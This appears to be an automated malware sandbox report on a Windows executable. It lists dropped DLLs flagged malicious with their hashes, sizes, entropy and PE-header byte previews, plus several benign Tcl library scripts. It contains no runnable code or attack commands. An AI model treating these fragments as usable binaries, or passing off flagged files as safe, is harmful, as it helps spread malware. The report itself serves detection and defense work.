                                                                                                                                                                                                                              SSDEEP:6144:Tt4e4UJ0STq5yCQCGNmwNby50erYs2uhCKeg09wd:TtZT6SGwCrxsOrYQe
                                                                                                                                                                                                                              MD5:C09A7A8EA25DDC38DC498806EAAAE8E4
                                                                                                                                                                                                                              SHA1:9E96616D04B6E02EB5018A63A35069ED8C1FFF98
                                                                                                                                                                                                                              SHA-256:78896672E2CD8346717F06EFED551347B3158DC10AAEC2FC61071C1791C06437
                                                                                                                                                                                                                              SHA-512:2AD92553AFB5C40844AC66466E043750D8FC5E324B8700D518068F638C0AE7B9C963CA9D22F91FD5A462C6718FF742E3CFD2BF7E3658437C73935719AA8FEEB2
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|.k...k...k.......k..]....k.......k..]....k..]....k..]....k.......k...k...k.......k.......k.......k.....k.......k..Rich.k..........................PE..d...OJ.f.........." ...(.....\............................................................`.........................................0...\....................`...<..................p...............................0...@............0...............................text...(........................... ..`.rdata.......0......................@..@.data....2... ......................@....pdata...<...`...>..................@..@.rsrc................F..............@..@.reloc...............H..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):119192
                                                                                                                                                                                                                              Entropy (8bit):6.6016214745004635
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                                                                                                                                                                                              MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                                                                                                                                                                                              SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                                                                                                                                                                                              SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                                                                                                                                                                                              SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):49528
                                                                                                                                                                                                                              Entropy (8bit):6.662491747506177
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:wPIyGVrxmKqOnA4j3z6Su77A+i0QLxi9z9Rtii9zn+:fBr87uW1nA8QLx+zrti+zn+
                                                                                                                                                                                                                              MD5:F8DFA78045620CF8A732E67D1B1EB53D
                                                                                                                                                                                                                              SHA1:FF9A604D8C99405BFDBBF4295825D3FCBC792704
                                                                                                                                                                                                                              SHA-256:A113F192195F245F17389E6ECBED8005990BCB2476DDAD33F7C4C6C86327AFE5
                                                                                                                                                                                                                              SHA-512:BA7F8B7AB0DEB7A7113124C28092B543E216CA08D1CF158D9F40A326FB69F4A2511A41A59EA8482A10C9EC4EC8AC69B70DFE9CA65E525097D93B819D498DA371
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9@.W}!..}!..}!...S...!..{....!..tYJ.v!..}!..N!..{...x!..{...z!..{...f!..{...|!..{.&.|!..{...|!..Rich}!..................PE..d.....v..........." ...&.<...8.......B...................................................`A........................................Pm.......m..x....................r..xO......D....c..p...........................`b..@............P..`............................text...p:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):71448
                                                                                                                                                                                                                              Entropy (8bit):6.263206909105092
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:BoxWhy9EQkTpR1Pg9qgTILN/86wW1lI1Onl7SyPxN3:BiWhy3k1Ra9qgTILN/Lw8lI1OnlB
                                                                                                                                                                                                                              MD5:CC0F232F2A8A359DEE29A573667E6D77
                                                                                                                                                                                                                              SHA1:D3FFBF5606D9C77A0DE0B7456F7A5314F420B1F7
                                                                                                                                                                                                                              SHA-256:7A5C88CE496BAFDF31A94AE6D70B017070703BC0A7DA1DFAE7C12B21BB61030D
                                                                                                                                                                                                                              SHA-512:48484177BF55179607D66F5A5837A35CD586E8A9FB185DE8B10865AAB650B056A61D1DC96370C5EFC6955CCB4E34B31810F8E1C8F5F02D268F565A73B4FF5657
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7_[.V1..V1..V1......V1.5.0..V1.5.2..V1.5.5..V1.5.4..V1...0..V1...0..V1..V0.qV1...<..V1...1..V1......V1...3..V1.Rich.V1.........................PE..d.....f.........." ...(.f................................................... ............`.............................................P......d......................../..............T...........................@...@............................................text...]e.......f.................. ..`.rdata..pO.......P...j..............@..@.data...p...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):85272
                                                                                                                                                                                                                              Entropy (8bit):6.591457260071925
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:+yhz79151BVo1vXfzIFnaR4bO1AsCn8Bsjk+tI1CVQ7Sy4x+R:Nhzx15evXkuxAB8BMk+tI1CVQF
                                                                                                                                                                                                                              MD5:DD26ED92888DE9C57660A7AD631BB916
                                                                                                                                                                                                                              SHA1:77D479D44D9E04F0A1355569332233459B69A154
                                                                                                                                                                                                                              SHA-256:324268786921EC940CBD4B5E2F71DAFD08E578A12E373A715658527E5B211697
                                                                                                                                                                                                                              SHA-512:D693367565005C1B87823E781DC5925146512182C8D8A3A2201E712C88DF1C0E66E65ECAEC9AF22037F0A8F8B3FB3F511EA47CFD5774651D71673FAB612D2897
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................b....(......(......(......(......(.....................................................Rich...........PE..d......f.........." ...(.....^...............................................`............`.........................................p...H............@.......0..D......../...P..........T...........................p...@............................................text...#........................... ..`.rdata..P>.......@..................@..@.data........ ......................@....pdata..D....0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):125208
                                                                                                                                                                                                                              Entropy (8bit):6.138116508461042
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:cXw32spTVYgFoj6N2xE9sb7VRf/EiZBq5syCtYPU9BI1LP885:cgGEOgFoj68ksrf/Ejsa5
                                                                                                                                                                                                                              MD5:C8AFA1EBB28828E1115C110313D2A810
                                                                                                                                                                                                                              SHA1:1D0D28799A5DBE313B6F4DDFDB7986D2902FA97A
                                                                                                                                                                                                                              SHA-256:8978972CF341CCD0EDF8435D63909A739DF7EF29EC7DD57ED5CAB64B342891F0
                                                                                                                                                                                                                              SHA-512:4D9F41BD23B62600D1EB097D1578BA656B5E13FD2F31EF74202AA511111969BB8CFC2A8E903DE73BD6E63FADAA59B078714885B8C5B8ECC5C4128FF9D06C1E56
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......f.d."..."..."...+...$....... .......&.......*...........7... ...i...#...i...$.......!..."......7...$...7...#...7...#...7...#...Rich"...........................PE..d....f.........." ...(............`_..............................................|.....`.........................................p`.......`.........................../......t.......T...............................@............................................text............................... ..`.rdata..hl.......n..................@..@.data...,5.......0...j..............@....pdata..............................@..@.rsrc...............................@..@.reloc..t...........................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257304
                                                                                                                                                                                                                              Entropy (8bit):6.565090204799859
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:3uQjqbJrTwvqM+eYx+lDJOAkl9qWM53pLW1AcfRRR6tlISgOg:3sTwvWeS+xJw4ln7g
                                                                                                                                                                                                                              MD5:CEA3B419C7CA87140A157629C6DBD299
                                                                                                                                                                                                                              SHA1:7DBFF775235B1937B150AE70302B3208833DC9BE
                                                                                                                                                                                                                              SHA-256:95B9850E6FB335B235589DD1348E007507C6B28E332C9ABB111F2A0035C358E5
                                                                                                                                                                                                                              SHA-512:6E3A6781C0F05BB5182073CCA1E69B6DF55F05FF7CDCEA394BACF50F88605E2241B7387F1D8BA9F40A96832D04F55EDB80003F0CF1E537A26F99408EE9312F5B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........V..............'.....g&......g&......g&......g&.......!.................9....!.......!.......!.......!K......!......Rich............PE..d.....f.........." ...(.....<............................................................`..........................................c..P....c...................&......./......T.......T...........................p...@............................................text...9........................... ..`.rdata..(...........................@..@.data...X*.......$...b..............@....pdata...&.......(..................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):66328
                                                                                                                                                                                                                              Entropy (8bit):6.227566291152438
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:/9gLpgE4Z27ARZWZnEmoAlI1OIH7SyT0xq:26RZeEmoAlI1OIHth
                                                                                                                                                                                                                              MD5:D19CB5CA144AE1FD29B6395B0225CF40
                                                                                                                                                                                                                              SHA1:5B9EC6E656261CE179DFCFD5C6A3CFE07C2DFEB4
                                                                                                                                                                                                                              SHA-256:F95EC2562A3C70FB1A6E44D72F4223CE3C7A0F0038159D09DCE629F59591D5AA
                                                                                                                                                                                                                              SHA-512:9AC3A8A4DBDB09BE3760E7CCB11269F82A47B24C03D10D289BCDDED9A43E57D3CD656F8D060D66B810382ECAC3A62F101F83EA626B58CD0B5A3CCA25B67B1519
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........N@.. ... ... ...... ..k!... ..k#... ..k$... ..k%... ..l!... ...!... ..h!... ...!.Y. ..l-... ..l ... ..l.... ..l"... .Rich.. .........................PE..d......f.........." ...(.V.......... @............................................../.....`.........................................p...P................................/......X...@}..T............................|..@............p..(............................text....T.......V.................. ..`.rdata...O...p...P...Z..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):160024
                                                                                                                                                                                                                              Entropy (8bit):6.85368707809341
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:lsvkxujgo7e2uONOG+hi+C8znfF9mNooXnmbutI1Z1mb:lnu0o7JUrNYOo2Kz
                                                                                                                                                                                                                              MD5:8CFBAFE65D6E38DDE8E2E8006B66BB3E
                                                                                                                                                                                                                              SHA1:CB63ADDD102E47C777D55753C00C29C547E2243C
                                                                                                                                                                                                                              SHA-256:6D548DB0AB73291F82CF0F4CA9EC0C81460185319C8965E829FAEACAE19444FF
                                                                                                                                                                                                                              SHA-512:FA021615D5C080AADCD5B84FD221900054EB763A7AF8638F70CF6CD49BD92773074F1AC6884F3CE1D8A15D59439F554381377FAEE4842ED5BEB13FF3E1B510F4
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D.3H%.`H%.`H%.`A]7`L%.`...aJ%.`...aK%.`...a@%.`...aD%.`]..aK%.`.].aJ%.`H%.`-%.`]..ar%.`]..aI%.`].[`I%.`]..aI%.`RichH%.`........................PE..d......f.........." ...(.f..........`8....................................................`......................................... %..L...l%..x....p.......P.......B.../......4.......T...............................@............................................text...be.......f.................. ..`.rdata..............j..............@..@.data...p....@......................@....pdata.......P......."..............@..@.rsrc........p.......6..............@..@.reloc..4............@..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):35608
                                                                                                                                                                                                                              Entropy (8bit):6.432025225087344
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:a1Rp7eiajKCWnAxQ0zduVI1Wt95YiSyvAAMxkE3:mRteiaoAxQ0zIVI1Wtj7SyGxr
                                                                                                                                                                                                                              MD5:EB859FC7F54CBA118A321440AD088096
                                                                                                                                                                                                                              SHA1:9D3C410240F4C5269E07FFBDE43D6F5E7CC30B44
                                                                                                                                                                                                                              SHA-256:14BDD15D60B9D6141009AEEDC606007C42B46C779A523D21758E57CF126DC2A4
                                                                                                                                                                                                                              SHA-512:694A9C1CC3DC78B47FAEDF66248FF078E5090CFAB22E95C123FB99B10192A5748748A5F0937FFD9FD8E1873AD48F290BE723FE194B7EB2A731ADD7F5FB776C4A
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.A)../z../z../z..z../z.$.{../z.$,{../z.$+{../z.$*{../z.#.{../z...zr./z[..{../z.#"{../z.#/{../z.#.z../z.#-{../zRich../z........PE..d.....f.........." ...(. ...>......@................................................J....`.........................................@E..`....E..x............p.......\.../...........4..T............................3..@............0...............................text............ .................. ..`.rdata... ...0..."...$..............@..@.data...`....`.......F..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):56088
                                                                                                                                                                                                                              Entropy (8bit):6.331247108655531
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:Minr44gaZPXxCJ/+yZdDDr5I1Xtw7Sy+xmS2:M3J/+yZdDDr5I1Xtwf
                                                                                                                                                                                                                              MD5:DF92EA698A3D0729B70A4306BBE3029F
                                                                                                                                                                                                                              SHA1:B82F3A43568148C64A46E2774AEC39BF1F2D3C1E
                                                                                                                                                                                                                              SHA-256:46DEC978EC8CB2146854739BFEDDEA93335DCC92A25D719352B94F9517855032
                                                                                                                                                                                                                              SHA-512:BDEBAFE1B40244A0CB6C97E75424F79CFE395774A9D03CDB02F82083110C1F4BDCAC2819BA1845AD1C56E2D2E6506DCC1833E4EB269BB0F620F0EB73B4D47817
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........a.{X..(X..(X..(QxT(\..(...)Z..(...)[..(...)P..(...)T..(M..)Z..(X..(/..(.x.)]..(.x.)Y..(M..)Y..(M..)Y..(M.8(Y..(M..)Y..(RichX..(........PE..d.....f.........." ...(.N...`.......................................................M....`.............................................X.............................../......(....f..T............................e..@............`...............................text...7L.......N.................. ..`.rdata...8...`...:...R..............@..@.data...0...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):32536
                                                                                                                                                                                                                              Entropy (8bit):6.552970921547832
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:1lzRmezd6rGjMoW4BI1QUGL5YiSyv8+WAMxkEW7:LRm0MGooW4BI1QUG17SyIxC7
                                                                                                                                                                                                                              MD5:7D91DD8E5F1DBC3058EA399F5F31C1E6
                                                                                                                                                                                                                              SHA1:B983653B9F2DF66E721ECE95F086C2F933D303FC
                                                                                                                                                                                                                              SHA-256:76BBA42B1392DC57A867AEF385B990FA302A4F1DCF453705AC119C9C98A36E8D
                                                                                                                                                                                                                              SHA-512:B8E7369DA79255A4BB2ED91BA0C313B4578EE45C94E6BC74582FC14F8B2984ED8FCDA0434A5BD3B72EA704E6E8FD8CBF1901F325E774475E4F28961483D6C7CF
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7.\.V...V...V...."..V..5...V..5...V..5...V..5...V......V.......V...V...V......V......V....N..V......V..Rich.V..........................PE..d.....f.........." ...(.....8.......................................................x....`..........................................C..L...<D..d....p.......`.......P.../...........4..T...........................@3..@............0..8............................text............................... ..`.rdata.......0......................@..@.data........P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):83736
                                                                                                                                                                                                                              Entropy (8bit):6.31969940395018
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:COYhekrkJqlerLSyypHi9/s+S+pzjii/n1IsJqKNBI1Lw9PD7Sy9duxJ:jwkJqHyypHi9/sT+pzjiE1IwdNBI1LwU
                                                                                                                                                                                                                              MD5:E43AED7D6A8BCD9DDFC59C2D1A2C4B02
                                                                                                                                                                                                                              SHA1:36F367F68FB9868412246725B604B27B5019D747
                                                                                                                                                                                                                              SHA-256:2C2A6A6BA360E38F0C2B5A53B4626F833A3111844D95615EBF35BE0E76B1EF7A
                                                                                                                                                                                                                              SHA-512:D92E26EB88DB891DE389A464F850A8DA0A39AF8A4D86D9894768CB97182B8351817CE14FE1EB8301B18B80D1D5D8876A48BA66EB7B874C7C3D7B009FCDBC8C4E
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...Nb}.Nb}.Nb}.6.}.Nb}g.c|.Nb}g.a|.Nb}g.f|.Nb}g.g|.Nb}..c|.Nb}.Nc}.Nb}.6c|.Nb}..o|.Nb}..b|.Nb}..}.Nb}..`|.Nb}Rich.Nb}................PE..d......f.........." ...(.x..........0-.......................................`......@.....`.........................................@...P............@.......0.........../...P......P...T...............................@............................................text....v.......x.................. ..`.rdata...x.......z...|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178456
                                                                                                                                                                                                                              Entropy (8bit):5.974570300962832
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:ZmkiCZfBmvD1ZLnM2Yfp6XSVJLX2GvMf1ba+VRJNI7IM/H9o/PCrXuI3JtI1C7lD:xiC5QD1dwp6XSxMfjTwJxd
                                                                                                                                                                                                                              MD5:6A2B0F8F50B47D05F96DEFF7883C1270
                                                                                                                                                                                                                              SHA1:2B1AEB6FE9A12E0D527B042512FC8890EEDB10D8
                                                                                                                                                                                                                              SHA-256:68DAD60FF6FB36C88EF1C47D1855517BFE8DE0F5DDEA0F630B65B622A645D53A
                                                                                                                                                                                                                              SHA-512:A080190D4E7E1ABB186776AE6E83DAB4B21A77093A88FCA59CE1F63C683F549A28D094818A0EE44186DDEA2095111F1879008C0D631FC4A8D69DD596EF76CA37
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........^..`...`...`......`./ia...`./ic...`./id...`./ie...`..na...`..ja...`...a.u.`...a...`..nm...`..n`...`..n....`..nb...`.Rich..`.........PE..d......f.........." ...(.............,....................................................`.............................................d...D...................P......../......x.......T...........................@...@............................................text............................... ..`.rdata...#.......$..................@..@.data...p...........................@....pdata..P............b..............@..@.rsrc................n..............@..@.reloc..x............x..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21523
                                                                                                                                                                                                                              Entropy (8bit):4.827830596623684
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:UqT9XC9VZv9QXCTxsCTHI7672ORgS0mzBvxFRTX7Xvt3wBTnFXhCUvuyqz:LT9XC9VZviXCVsCLI7JlmzBvTxvt3gTW
                                                                                                                                                                                                                              MD5:08EDF746B4A088CB4185C165177BD604
                                                                                                                                                                                                                              SHA1:395CDA114F23E513EEF4618DA39BB86D034124BF
                                                                                                                                                                                                                              SHA-256:517204EE436D08EFC287ABC97433C3BFFCAF42EC6592A3009B9FD3B985AD772C
                                                                                                                                                                                                                              SHA-512:C1727E265A6B0B54773C886A1BCE73512E799BA81A4FCEEEB84CDC33F5505A5E0984E96326A78C46BF142BC4652A80E213886F60EB54ADF92E4DFFE953C87F6B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# auto.tcl --..#..# utility procs formerly in init.tcl dealing with auto execution of commands..# and can be auto loaded themselves...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1998 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# auto_reset --..#..# Destroy all cached information for auto-loading and auto-execution, so that..# the information gets recomputed the next time it's needed. Also delete any..# commands that are listed in the auto-load index...#..# Arguments:..# None.....proc auto_reset {} {.. global auto_execs auto_index auto_path.. if {[array exists auto_index]} {...foreach cmdName [array names auto_index] {... set fqcn [namespace which $cmdName]... if {$fqcn eq ""} {....continue... }... rename $fqcn {}...}.. }.. unset -nocomplain auto_execs auto_index ::tcl::auto_oldpath.. if {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):133439
                                                                                                                                                                                                                              Entropy (8bit):5.044814789288095
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:Cbn4IAhYvuCg9epsArAzqpSMpWzP7ejMiIAxBPqGYkPAPaZpHYM8EN4LhVLlarXL:Cbn4IM9epsArSqpSMpWzP7ejM/eBPqG3
                                                                                                                                                                                                                              MD5:88BB44A1364147FDD80F9FD78FBCEF61
                                                                                                                                                                                                                              SHA1:2C3454D2669F0CA83FECF17976D599C85B86E615
                                                                                                                                                                                                                              SHA-256:1947F8B188AB4AB6AA72EA68A58D2D9ADD0894FDF320F6B074EAE0F198368FB7
                                                                                                                                                                                                                              SHA-512:010B13E8A2D50521B5D7ADCC5F32F7CDE3F12E1053961C575D967DC6CFD368640BF45D23832E5E9C3868CDCA9FE0505698F949C5557D4169353634C94AA196B5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#----------------------------------------------------------------------..#..# clock.tcl --..#..#.This file implements the portions of the [clock] ensemble that are..#.coded in Tcl. Refer to the users' manual to see the description of..#.the [clock] command and its subcommands...#..#..#----------------------------------------------------------------------..#..# Copyright (c) 2004-2007 Kevin B. Kenny..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#..#----------------------------------------------------------------------....# We must have message catalogs that support the root locale, and we need..# access to the Registry on Windows systems.....uplevel \#0 {.. package require msgcat 1.6.. if { $::tcl_platform(platform) eq {windows} } {...if { [catch { package require registry 1.1 }] } {... namespace eval ::tcl::clock [list variable NoRegistry {}]...}.. }..}....# Put the library directory in
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):2.1033474959326957
